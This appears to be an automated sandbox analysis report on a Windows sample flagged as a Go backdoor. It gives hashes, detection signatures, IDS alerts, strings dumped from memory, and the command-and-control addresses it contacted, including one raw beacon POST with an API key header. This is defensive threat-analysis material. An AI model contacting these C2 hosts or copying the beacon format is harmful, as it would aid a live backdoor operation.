
Windows Analysis Report
Week11.exe.bin.exe

Overview

General Information

Sample name:Week11.exe.bin.exe
Analysis ID:1553244
MD5:4fbc4f26e90324c3b535943452460761
SHA1:032f96166bb573c9029f65aefb91d22b8a4940ed
SHA256:82e9465d41073e2678135009e179de5a0d0973bf439f6cac53db9b9f45130148
Tags:exeuser-JaffaCakes118
Infos:

Detection

GO Backdoor
Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GO Backdoor
AI detected suspicious sample
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to infect the boot sector
Found Tor onion address
AV process strings found (often used to terminate AV products)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • Week11.exe.bin.exe (PID: 7116 cmdline: "C:\Users\user\Desktop\Week11.exe.bin.exe" MD5: 4FBC4F26E90324C3B535943452460761)
  • cleanup
No configs have been found
Source                                          | Rule                    | Description               | Author        | Strings
------------------------------------------------|-------------------------|---------------------------|---------------|--------
Process Memory Space: Week11.exe.bin.exe PID: 7116 | JoeSecurity_GOBackdoor | Yara detected GO Backdoor | Joe Security  |
    No Sigma rule has matched
    Timestamp                        | SID     | Severity | Classtype                     | Source IP       | Source Port | Destination IP  | Destination Port | Protocol
    ---------------------------------|---------|----------|-------------------------------|-----------------|-------------|-----------------|------------------|---------
    2024-11-10T16:48:27.568206+0100  | 2022930 | 1        | A Network Trojan was detected | 52.149.20.212   | 443         | 192.168.2.7     | 49740            | TCP
    2024-11-10T16:49:06.205644+0100  | 2022930 | 1        | A Network Trojan was detected | 52.149.20.212   | 443         | 192.168.2.7     | 49966            | TCP
    2024-11-10T16:48:51.808327+0100  | 2855536 | 1        | A Network Trojan was detected | 192.168.2.7     | 49893       | 185.157.213.253 | 12072            | TCP
    2024-11-10T16:49:21.106238+0100  | 2855537 | 1        | A Network Trojan was detected | 192.168.2.7     | 49893       | 185.157.213.253 | 12072            | TCP
    2024-11-10T16:49:21.344322+0100  | 2855538 | 1        | A Network Trojan was detected | 185.157.213.253 | 12072       | 192.168.2.7     | 49893            | TCP
    2024-11-10T16:48:51.808061+0100  | 2855539 | 1        | A Network Trojan was detected | 185.157.213.253 | 12072       | 192.168.2.7     | 49893            | TCP


    AV Detection

    barindex
    Source: Week11.exe.bin.exeReversingLabs: Detection: 36%
    Source: Submitted SampleIntegrated Neural Analysis Model: Matched 95.0% probability
    Source: Week11.exe.bin.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: Week11.exe.bin.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
    Source: Binary string: C:\vmagent_new\bin\joblist\498883\out\Release\QHFileSmasher.pdb source: Week11.exe.bin.exe
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_0046C990 FindFirstFileW,1_2_0046C990
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_0046D300 _memset,FindFirstFileW,FindNextFileW,FindNextFileW,1_2_0046D300
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_004479B0 WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,PathIsDirectoryW,_memset,FindFirstFileW,InterlockedCompareExchange,Sleep,Sleep,FindNextFileW,FindClose,WaitForSingleObject,WaitForSingleObject,InterlockedCompareExchange,_memset,Sleep,Sleep,_memset,PathFileExistsW,1_2_004479B0
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_00449B60 FindFirstFileW,1_2_00449B60
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_0046DE90 GetLogicalDriveStringsW,GetLogicalDriveStringsW,_memset,GetLogicalDriveStringsW,_wcsnlen,_wcsnlen,1_2_0046DE90
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 4x nop then shr ecx, 0Dh1_2_031C84C0
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 4x nop then mov dword ptr [esp], edx1_2_031BD130
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 4x nop then shr ebp, 0Dh1_2_031C7A50

    Networking

    barindex
    Source: Network trafficSuricata IDS: 2855539 - Severity 1 - ETPRO MALWARE Unknown Golang Backdoor CnC Server Response M2 : 185.157.213.253:12072 -> 192.168.2.7:49893
    Source: Network trafficSuricata IDS: 2855536 - Severity 1 - ETPRO MALWARE Unknown Golang Backdoor CnC Client Request M1 : 192.168.2.7:49893 -> 185.157.213.253:12072
    Source: Network trafficSuricata IDS: 2855537 - Severity 1 - ETPRO MALWARE Unknown Golang Backdoor CnC Client Request M2 : 192.168.2.7:49893 -> 185.157.213.253:12072
    Source: Network trafficSuricata IDS: 2855538 - Severity 1 - ETPRO MALWARE Unknown Golang Backdoor CnC Server Response M1 : 185.157.213.253:12072 -> 192.168.2.7:49893
    Source: Week11.exe.bin.exe, 00000001.00000002.2482404287.0000000002A60000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: GoneDATAPING&lt;&gt;1080openStat.com.bat.cmdnullbooljson'\''3125Atoiint8uintchanfunccallkind != AhomChamKawiLisuMiaoModiNewaThaiTotoDashquitermssse3avx2bmi1bmi2bitsNameTypeFrom.css.gif.htm.jpg.mjs.pdf.png.svg.xmlxn--asn1tag:false<nil>ErrorMarchAprilmonthLocal+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930defersweepschedhchansudoggscanmheaptracepanicsleepgcingusagefault[...]hostswriteclosefileshttpsimap2imap3imapspop3s:***@Rangeallowrange:path%s %q%s=%sHTTP/socksFound&amp;&#34;&#39;chdirchmodLstatarray%s:%dyamuxlocal1562578125int16int32int64uint8sliceAdlamBamumBatakBuhidDograGreekKhmerLatinLimbuNushuOghamOriyaOsageRunicTakriTamilSTermntohssse41sse42ssse3 (at ClassTypeAtls: Earlyparseutf-8%s*%dtext/.avif.html.jpeg.json.wasm.webpRealmbad nSHA-1P-224P-256P-384P-521ECDSAupdatekilledconfigStringFormat[]bytestringSundayMondayFridayAugustminutesecondUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13sysmontimersefenceselect, not objectstatusnetdns.locallisten.onionip+netreturnsocketacceptdomaingophertelnetClosedBasic CookiecookieexpectoriginserverclosedExpectPragmasocks LockedCANCELGOAWAYPADDEDactivesocks5renameexec: remote390625uint16uint32uint64structchan<-<-chan ValueArabicBrahmiCarianChakmaCommonCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTai_LeTangsaTangutTeluguThaanaWanchoYezidiHyphenhanguprdtscppopcntcmd/go, val LengthTypeNSTypeMXheaderAnswerGetACPX25519%w%.0wAcceptServerSTREETwindowsfloat32float64TuesdayJanuaryOctoberMUI_StdMUI_DltforcegccpuprofunknowngctraceIO waitrunningUNKNOWN:eventswsarecvwsasendconnectopenbsdlookup UpgradeReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUGTrailer:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECTHEADERSconsolePATHEXTrefused19531259765625invaliduintptrSwapperChanDir 
Value>ConvertAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutaRadicalabortedCopySidWSARecvWSASendsignal os/execruntime::ffff:nil keyanswersTypeSOATypePTRTypeTXTTypeSRVTypeOPTTypeWKSTypeALLderivedInitialExpiresSubjectutf-8''charsetSHA-224SHA-256SHA-384SHA-512#internDES-CBCEd25519MD2-RSAMD5-RSAserial:2.5.4.62.5.4.32.5.4.72.5.4.82.5.4.92.5.4.5scavengepollDescrwmutexWrwmutexRtraceBufdeadlockraceFinipanicnilcgocheck is not pointerBAD RANKruntime.reflect.net/httpgo/buildx509sha1profBlockstackpoolhchanLeafwbufSpansmSpanDeadscavtraceinittracepanicwaitchan sendpreemptedinterfacectxt != 0atomicor8tracebackcomplex64pclmulqdqmath/randrwxrwxrwxtime.Date(time.LocalnotifyListprofInsertstackLargemSpanInUseGOMAXPROCSstop traceinvalidptrschedtracesemacquiredebug callGOMEMLIMITexitThreadBad varintatomicand8float64nanfloat32nanunknown pccomplex128execerrdothttp2debugcrypto/tlsassistQueuenetpollInitreflectOffsglobalAllocmSpanManualstart traceclobberfreegccheckmarkscheddetailcgocall nilunreachablebad m valuebad timedivfloat64nan1float64nan2float64nan3float32nan2gocachehashgocachetesthttp2clienthttp
    Source: Week11.exe.bin.exe, 00000001.00000002.2483016683.00000000031A0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: GoneDATAPING&lt;&gt;1080openStat.com.bat.cmdnullbooljson'\''3125Atoiint8uintchanfunccallkind != AhomChamKawiLisuMiaoModiNewaThaiTotoDashquitermssse3avx2bmi1bmi2bitsNameTypeFrom.css.gif.htm.jpg.mjs.pdf.png.svg.xmlxn--asn1tag:false<nil>ErrorMarchAprilmonthLocal+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930defersweepschedhchansudoggscanmheaptracepanicsleepgcingusagefault[...]hostswriteclosefileshttpsimap2imap3imapspop3s:***@Rangeallowrange:path%s %q%s=%sHTTP/socksFound&amp;&#34;&#39;chdirchmodLstatarray%s:%dyamuxlocal1562578125int16int32int64uint8sliceAdlamBamumBatakBuhidDograGreekKhmerLatinLimbuNushuOghamOriyaOsageRunicTakriTamilSTermntohssse41sse42ssse3 (at ClassTypeAtls: Earlyparseutf-8%s*%dtext/.avif.html.jpeg.json.wasm.webpRealmbad nSHA-1P-224P-256P-384P-521ECDSAupdatekilledconfigStringFormat[]bytestringSundayMondayFridayAugustminutesecondUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13sysmontimersefenceselect, not objectstatusnetdns.locallisten.onionip+netreturnsocketacceptdomaingophertelnetClosedBasic CookiecookieexpectoriginserverclosedExpectPragmasocks LockedCANCELGOAWAYPADDEDactivesocks5renameexec: remote390625uint16uint32uint64structchan<-<-chan ValueArabicBrahmiCarianChakmaCommonCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTai_LeTangsaTangutTeluguThaanaWanchoYezidiHyphenhanguprdtscppopcntcmd/go, val LengthTypeNSTypeMXheaderAnswerGetACPX25519%w%.0wAcceptServerSTREETwindowsfloat32float64TuesdayJanuaryOctoberMUI_StdMUI_DltforcegccpuprofunknowngctraceIO waitrunningUNKNOWN:eventswsarecvwsasendconnectopenbsdlookup UpgradeReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUGTrailer:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECTHEADERSconsolePATHEXTrefused19531259765625invaliduintptrSwapperChanDir 
Value>ConvertAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutaRadicalabortedCopySidWSARecvWSASendsignal os/execruntime::ffff:nil keyanswersTypeSOATypePTRTypeTXTTypeSRVTypeOPTTypeWKSTypeALLderivedInitialExpiresSubjectutf-8''charsetSHA-224SHA-256SHA-384SHA-512#internDES-CBCEd25519MD2-RSAMD5-RSAserial:2.5.4.62.5.4.32.5.4.72.5.4.82.5.4.92.5.4.5scavengepollDescrwmutexWrwmutexRtraceBufdeadlockraceFinipanicnilcgocheck is not pointerBAD RANKruntime.reflect.net/httpgo/buildx509sha1profBlockstackpoolhchanLeafwbufSpansmSpanDeadscavtraceinittracepanicwaitchan sendpreemptedinterfacectxt != 0atomicor8tracebackcomplex64pclmulqdqmath/randrwxrwxrwxtime.Date(time.LocalnotifyListprofInsertstackLargemSpanInUseGOMAXPROCSstop traceinvalidptrschedtracesemacquiredebug callGOMEMLIMITexitThreadBad varintatomicand8float64nanfloat32nanunknown pccomplex128execerrdothttp2debugcrypto/tlsassistQueuenetpollInitreflectOffsglobalAllocmSpanManualstart traceclobberfreegccheckmarkscheddetailcgocall nilunreachablebad m valuebad timedivfloat64nan1float64nan2float64nan3float32nan2gocachehashgocachetesthttp2clienthttp
    Source: global trafficTCP traffic: 192.168.2.7:49893 -> 185.157.213.253:12072
    Source: Joe Sandbox View, IP Address: 46.8.232.106
    Source: Joe Sandbox View, IP Address: 188.130.206.243
    Source: Joe Sandbox View, IP Address: 93.185.159.253
    Source: Joe Sandbox View, ASN Name: TVHORADADAES
    Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 52.149.20.212:443 -> 192.168.2.7:49740
    Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 52.149.20.212:443 -> 192.168.2.7:49966
    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.236.61
    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.236.61
    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.236.61
    Source: unknownTCP traffic detected without corresponding DNS query: 93.185.159.253
    Source: unknownTCP traffic detected without corresponding DNS query: 93.185.159.253
    Source: unknownTCP traffic detected without corresponding DNS query: 93.185.159.253
    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.236.61
    Source: unknownTCP traffic detected without corresponding DNS query: 91.212.166.91
    Source: unknownTCP traffic detected without corresponding DNS query: 91.212.166.91
    Source: unknownTCP traffic detected without corresponding DNS query: 91.212.166.91
    Source: unknownTCP traffic detected without corresponding DNS query: 93.185.159.253
    Source: unknownTCP traffic detected without corresponding DNS query: 91.212.166.91
    Source: unknownTCP traffic detected without corresponding DNS query: 188.130.206.243
    Source: unknownTCP traffic detected without corresponding DNS query: 188.130.206.243
    Source: unknownTCP traffic detected without corresponding DNS query: 188.130.206.243
    Source: unknownTCP traffic detected without corresponding DNS query: 188.130.206.243
    Source: unknownTCP traffic detected without corresponding DNS query: 93.185.159.253
    Source: unknownTCP traffic detected without corresponding DNS query: 91.212.166.91
    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.236.61
    Source: unknownTCP traffic detected without corresponding DNS query: 188.130.206.243
    Source: unknownTCP traffic detected without corresponding DNS query: 93.185.159.253
    Source: unknownTCP traffic detected without corresponding DNS query: 91.212.166.91
    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.236.61
    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.236.61
    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.236.61
    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.236.61
    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
    Source: unknownTCP traffic detected without corresponding DNS query: 93.185.159.253
    Source: unknownTCP traffic detected without corresponding DNS query: 93.185.159.253
    Source: unknownTCP traffic detected without corresponding DNS query: 93.185.159.253
    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.236.61
    Source: unknownTCP traffic detected without corresponding DNS query: 91.212.166.91
    Source: unknownTCP traffic detected without corresponding DNS query: 91.212.166.91
    Source: unknownTCP traffic detected without corresponding DNS query: 91.212.166.91
    Source: unknownTCP traffic detected without corresponding DNS query: 93.185.159.253
    Source: unknownTCP traffic detected without corresponding DNS query: 188.130.206.243
    Source: unknownTCP traffic detected without corresponding DNS query: 188.130.206.243
    Source: unknownTCP traffic detected without corresponding DNS query: 188.130.206.243
    Source: unknownTCP traffic detected without corresponding DNS query: 91.212.166.91
    Source: unknownTCP traffic detected without corresponding DNS query: 91.212.166.91
    Source: unknownTCP traffic detected without corresponding DNS query: 93.185.159.253
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_00454F30 DeleteUrlCacheEntryW,InternetOpenW,InternetSetOptionW,InternetSetOptionW,InternetSetOptionW,InternetSetOptionW,InternetSetOptionW,InternetOpenUrlW,InternetCloseHandle,HttpQueryInfoW,_memset,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,1_2_00454F30
    Source: unknownHTTP traffic detected: POST / HTTP/1.1Host: 46.8.232.106User-Agent: Go-http-client/1.1Content-Length: 198X-Api-Key: imeRTf84Accept-Encoding: gzipData Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 03 16 21 1a 07 1a 13 29 01 03 1e 2f 00 3a 5f 3e 10 3b 56 11 0e 08 1e 22 09 36 3e 5b 08 5d 14 27 07 0b 2e 07 06 06 1d 5f 12 5b 35 07 5d 2b 0b 1c 57 29 1b 22 56 3c 0e 11 58 1c 2d 21 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 2f 27 24 56 3f 2d 1a 17 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 22 39 22 0c 3c 38 5f 03 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 54 16 19 48 0a 2a 15 5c 38 08 05 45 4f 4d 03 02 5c 45 59 4d 5a 00 0b 04 57 09 5c 50 0c 5e 53 5c 5c 52 0a 54 01 5a 5d 53 50 53 50 5b 5b 54 5d 51 53 58 58 57 4b 1a Data Ascii: M*L\K!)/:_>;V"6>[]'._[5]+W)"V<X-!EOM:DSE/'$V?-LJK9AUL"9"<8_EOM9L\KWTH*\8EOM\EYMZW\P^S\\RTZ]SPSP[[T]QSXXWK
    Source: Week11.exe.bin.exe, 00000001.00000002.2483895164.000000000C0F4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://188.130.206.243
    Source: Week11.exe.bin.exe, 00000001.00000002.2483895164.000000000C0F2000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://188.130.206.243heaXtT44tdKipmZh:U1K/ZFS/B554WCj6H79.pow8BpV.hQr2pbE3AbJ2hKD.cW01SSc0hAZ6j7b
    Source: Week11.exe.bin.exe, 00000001.00000002.2483895164.000000000C0F2000.00000004.00001000.00020000.00000000.sdmp, Week11.exe.bin.exe, 00000001.00000002.2483895164.000000000C0F4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://188.130.206.243http://46.8.232.106
    Source: Week11.exe.bin.exe, 00000001.00000002.2483895164.000000000C0F4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://46.8.232.106
    Source: Week11.exe.bin.exe, 00000001.00000002.2483895164.000000000C0F4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://46.8.236.61
    Source: Week11.exe.bin.exe, 00000001.00000002.2483895164.000000000C0F4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://91.212.166.91
    Source: Week11.exe.bin.exe, 00000001.00000002.2483895164.000000000C0F4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://93.185.159.253
    Source: Week11.exe.bin.exeString found in binary or memory: http://s.360safe.com/safei18n/
    Source: Week11.exe.bin.exeString found in binary or memory: http://www.360totalsecurity.com/d/ts/%s/%s/channelOpen
    Source: shared.xmlString found in binary or memory: https://store.360totalsecurity.com/
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_004171D5 NtQueryDefaultLocale,1_2_004171D5
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_004158C8 StrStrIW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,NtQueryDefaultLocale,NtQueryDefaultLocale,1_2_004158C8
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_00416050 NtQueryDefaultLocale,1_2_00416050
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_0041612B NtQueryDefaultLocale,1_2_0041612B
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_00416246 NtQueryDefaultLocale,1_2_00416246
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_004162E6 NtQueryDefaultLocale,1_2_004162E6
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_00416468 NtQueryDefaultLocale,1_2_00416468
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_004164E8 NtQueryDefaultLocale,1_2_004164E8
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_00416481 NtQueryDefaultLocale,1_2_00416481
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_0041667D NtQueryDefaultLocale,1_2_0041667D
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_004166AE NtQueryDefaultLocale,1_2_004166AE
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_00416776 NtQueryDefaultLocale,1_2_00416776
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_00416817 NtQueryDefaultLocale,1_2_00416817
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_004168F4 NtQueryDefaultLocale,1_2_004168F4
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_004169EC NtQueryDefaultLocale,1_2_004169EC
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_00416993 NtQueryDefaultLocale,1_2_00416993
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_00414A30 NtQueryDefaultLocale,1_2_00414A30
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_00416CCA NtQueryDefaultLocale,1_2_00416CCA
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_00416CA5 NtQueryDefaultLocale,1_2_00416CA5
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_00416CB0 NtQueryDefaultLocale,1_2_00416CB0
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_00416DDA NtQueryDefaultLocale,1_2_00416DDA
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_00416D8F NtQueryDefaultLocale,1_2_00416D8F
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_00414EC6 StrStrIW,StrStrIW,StrStrIW,NtQueryDefaultLocale,NtQueryDefaultLocale,1_2_00414EC6
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_00416E88 NtQueryDefaultLocale,1_2_00416E88
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_00416FA1 NtQueryDefaultLocale,1_2_00416FA1
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_00417022 NtQueryDefaultLocale,1_2_00417022
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_0041712E NtQueryDefaultLocale,1_2_0041712E
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_00417133 NtQueryDefaultLocale,1_2_00417133
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_0041718B NtQueryDefaultLocale,1_2_0041718B
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_004153D1 NtQueryDefaultLocale,NtQueryDefaultLocale,1_2_004153D1
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_004153FB NtQueryDefaultLocale,NtQueryDefaultLocale,1_2_004153FB
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_004153B1 StrStrIW,StrStrIW,StrStrIW,NtQueryDefaultLocale,NtQueryDefaultLocale,1_2_004153B1
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_004153B6 NtQueryDefaultLocale,NtQueryDefaultLocale,1_2_004153B6
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_004153BD NtQueryDefaultLocale,NtQueryDefaultLocale,1_2_004153BD
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_0041741B NtQueryDefaultLocale,1_2_0041741B
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_00415424 NtQueryDefaultLocale,NtQueryDefaultLocale,1_2_00415424
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_00417430 NtQueryDefaultLocale,1_2_00417430
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_004156F5 NtQueryDefaultLocale,NtQueryDefaultLocale,1_2_004156F5
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_00415682 NtQueryDefaultLocale,NtQueryDefaultLocale,1_2_00415682
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_0041568F NtQueryDefaultLocale,NtQueryDefaultLocale,1_2_0041568F
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_004156A2 NtQueryDefaultLocale,NtQueryDefaultLocale,1_2_004156A2
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_00415787 NtQueryDefaultLocale,NtQueryDefaultLocale,1_2_00415787
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_0041595B StrStrIW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,NtQueryDefaultLocale,NtQueryDefaultLocale,1_2_0041595B
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_00415962 StrStrIW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,NtQueryDefaultLocale,NtQueryDefaultLocale,1_2_00415962
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_00415BF4 NtQueryDefaultLocale,NtQueryDefaultLocale,1_2_00415BF4
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_031E0060 SetWaitableTimer,NtWaitForSingleObject,1_2_031E0060
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_031FC7B0 NtWaitForSingleObject,1_2_031FC7B0
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_031D6B90 SetWaitableTimer,NtWaitForSingleObject,1_2_031D6B90
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_031D6E00 SetWaitableTimer,NtWaitForSingleObject,1_2_031D6E00
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_031D6D30 SetWaitableTimer,NtWaitForSingleObject,1_2_031D6D30
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_031CEC30 LoadLibraryExW,RtlAddVectoredContinueHandler,LoadLibraryExW,LoadLibraryExW,NtWaitForSingleObject,RtlGetCurrentPeb,RtlGetNtVersionNumbers,LoadLibraryExW,timeBeginPeriod,timeEndPeriod,timeBeginPeriod,LoadLibraryExW,WSAGetOverlappedResult,1_2_031CEC30
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_031D6C60 SetWaitableTimer,NtWaitForSingleObject,1_2_031D6C60
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_004AB600: DeviceIoControl,1_2_004AB600
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_0041E8051_2_0041E805
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_004171D51_2_004171D5
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_004158C81_2_004158C8
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_004160501_2_00416050
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_004100551_2_00410055
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_0041C0041_2_0041C004
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_0041C0261_2_0041C026
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_0041C0CB1_2_0041C0CB
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_0040609D1_2_0040609D
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_0041612B1_2_0041612B
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_0041C1371_2_0041C137
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_004061FC1_2_004061FC
